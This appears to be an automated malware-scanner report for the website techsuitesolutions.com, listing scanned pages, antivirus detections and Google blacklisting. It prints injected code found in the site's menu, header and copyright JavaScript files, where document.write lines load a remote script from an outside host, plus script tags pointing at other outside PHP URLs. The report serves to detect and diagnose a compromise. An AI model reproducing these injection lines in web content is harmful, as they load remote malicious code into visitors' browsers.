New scan:

Malware Scanner report for techsuitesolutions.com

Malicious/Suspicious/Total urls checked
6/4/12
10 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "techsuitesolutions.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=techsuitesolutions.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://techsuitesolutions.com/
200 OK
Content-Length: 6734
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.digitalcityshopping.com/k86vhycj.php?id=946313"></script>

http://techsuitesolutions.com/javascripts.js
200 OK
Content-Length: 79
Content-Type: application/javascript
clean
http://techsuitesolutions.com/pop-closeup.js
200 OK
Content-Length: 6098
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- Begin POP-UP SIZES AND OPTIONS CODE
var slideshow_button = "yes" var close_button = "yes" var print_button = "yes" var right_click_on = "yes" var border_color = "000000" var background_color = "FFFFFF" var viewer = "no"
var zoom = "yes" var right_click_text = "You may not right mouse click this page"
var view_width = 725 var view_height = 525 var slideshow_width = 725 var slideshow_height = 525 var scrollbarS = "0"
var Tour_width = 750 var To
... 4674 bytes are skipped ...
ay = new Date();
id = day.getTime();
if (Tour_viewer == "no") {
eval("page" id " = window.open(URL, '" id "', 'toolbar=0,scrollbars=' Tour_scrollbarS ',location=0,statusbar=0,menubar=0,resizable=1,width=' Tour_width ',height=' Tour_height '');");
}
else
if (Tour_viewer == "yes") {
eval("page" id " = window.open(URL);");
}
}
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:Agent-CMO [Trj]

http://techsuitesolutions.com/graphic_logo_header.js
200 OK
Content-Length: 1950
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- Begin HEADER OPTIONS CODE
var color = "000000" var flashheight = "75" var flashwidth = "750" var stripecolor = "000000"
document.write('<TABLE cellpadding=0 cellspacing=0 border=0 width="100%" bgcolor="#' color '" background="picts/top-background.gif"><tr>');
document.write('<td ALIGN="left" VALIGN="bottom">');
document.write('<a href="index.html"><IMG SRC="picts/logo2.jpg" border="0"></a><br>');
document.write('</t
... 398 bytes are skipped ...
tion Sound()
{
if (document.all)
{
document.all.sound.src = "click.wav";
}
}
document.write('<div id="date-location" style="left: -50px; POSITION: absolute; TOP: 5px">');
document.write('<EMBED SRC="success.wav" autostart="false" hidden="true">');
document.write('<bgsound id="sound">');
document.write('</div>');
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:Agent-CMO [Trj]
NANO-Antivirus
Trojan.Url.IframeB.crtqyg

http://techsuitesolutions.com/menu.js
200 OK
Content-Length: 2436
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- Begin
document.write('<TABLE cellpadding="0" cellspacing="0" border="0" WIDTH="100%" height="31" bgcolor="#26558B"><tr><td align="left" valign="middle">');
document.write('<TABLE cellpadding="0" cellspacing="0" border="0"><tr><td>');
document.write('<img src="picts/spacer.gif" width="10" height="10"></a><br>');
document.write('</td><td nowrap>');
document.write('<a href="index.html" class="menu" onMo
... 1584 bytes are skipped ...
r></table>');
var stripecolor = "000000"
document.write('<TABLE cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td bgcolor="#' stripecolor '" colspan="2">');
document.write('<IMG SRC="picts/spacer.gif" HEIGHT="1" WIDTH="15" border="0"><BR>');
document.write('</td></tr></table>');
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
6a5be*/

Antivirus reports:

Avast
JS:Agent-CMO [Trj]
NANO-Antivirus
Trojan.Url.IframeB.crtqyg

http://techsuitesolutions.com/sidebar.js
200 OK
Content-Length: 3793
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- Begin POP-UP SIZES AND OPTIONS CODE
var showimage_1 = "yes" var showimage_2 = "yes" var showimage_3 = "yes" var spacing = "20" var paragraph_1 = "no" var paragraph_2 = "no"
var showdate = "yes" var dateLR = "right" var dateX = "10" var dateY = "200"
var showpaypal = "no" var paypalemail = "your@email.com"
document.write('<img src="picts/spacer.gif" height="' spacing '" width="10"><br>')
if (showimage_1 == "yes") {
document.
... 2314 bytes are skipped ...
"July","August","September","October","November","December")
document.write("<span class=\"date-font\"><nobr>" weekday[d.getDay()] " ")
document.write(monthname[d.getMonth()] " ")
document.write(d.getDate() ". ")
document.write(d.getFullYear())
document.write("</nobr><br></span>")
document.write('</div>');
}
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:Agent-CMO [Trj]
NANO-Antivirus
Trojan.Url.IframeB.crtqyg

http://techsuitesolutions.com/copyright.js
200 OK
Content-Length: 727
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- Begin
<!-- NOTE: If you use a ' add a slash before it like this \' -->
document.write('<span class="copytext">&copy;Copyright 2008 ');
document.write('<a href="index.html" target="_top">Tech Suite Solutions, LLC</a> ');
document.write('All Rights Reserved<br>');
document.write('For more information feel free to ');
document.write(' <A HREF="mailto:info@techsuitesolutions.com">Contact Us</a>');
document.write('</span><br>');
// End -->
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
/*/339810*/

Antivirus reports:

Avast
JS:Agent-CMO [Trj]
Ad-Aware
Trojan.JS.Injector.CN
Ikarus
Trojan.JS.Blacole
nProtect
Trojan.JS.Injector.CN
TrendMicro-HouseCall
TROJ_GEN.F47V1219
Emsisoft
Trojan.JS.Injector.CN (B)
MicroWorld-eScan
Trojan.JS.Injector.CN
NANO-Antivirus
Trojan.Url.IframeB.crtqyg
F-Secure
Trojan.JS.Injector.CN
GData
Trojan.JS.Injector.CN
BitDefender
Trojan.JS.Injector.CN

http://techsuitesolutions.com/copyright-techsuite.js
200 OK
Content-Length: 673
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!-- start
document.write('<span class="copytext">');
document.write('<a href="http://www.techsuitesolutions.com" target="_top">Tech Suite Solutions, LLC</a>');
document.write('<a href="http://www.techsuitesolutions.com" target="_top"></a><br>Hosting and Site Development &copy;2008');
document.write('</span>');
document.write('<br>');
document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:Agent-CMO [Trj]
NANO-Antivirus
Trojan.Url.IframeB.crtqyg

http://cdn.automaticsitemap.com/badge/js/19523/core.js
200 OK
Content-Length: 993
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: www.techsuitesolutions.com

var asm_siteid = 19523;
function asm_windowWidth() {
if(navigator) {
if (parseInt(navigator.appVersion,10)>3) {
if (navigator.appName=="Netscape") { return window.innerWidth; }
if (navigator.appName.indexOf("Microsoft")!=-1) { return document.body.offsetWidth; }
}
}
return 0;
}
function asm_windowHeight() {
if(navigator) {
if (parseInt(navigator.appVersion,10)&
...[668 bytes skipped]...

http://techsuitesolutions.com/contact.htm
200 OK
Content-Length: 6158
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.digitalcityshopping.com/k86vhycj.php?id=946307"></script>

http://techsuitesolutions.com/phone.js
200 OK
Content-Length: 865
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.din-27001.de/mrkjm4zv.php?id=122692461"></script>');

http://techsuitesolutions.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: techsuitesolutions.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 04:25:24 GMT
Accept-Ranges: bytes
ETag: "5781519-1a4e-50c2e158acc40"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 6734
Content-Type: text/html
Last-Modified: Fri, 09 Jan 2015 01:29:13 GMT

...6734 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: techsuitesolutions.com
Referer: http://www.google.com/search?q=techsuitesolutions.com

Result:
The result is similar to the first query. There are no suspicious redirects found.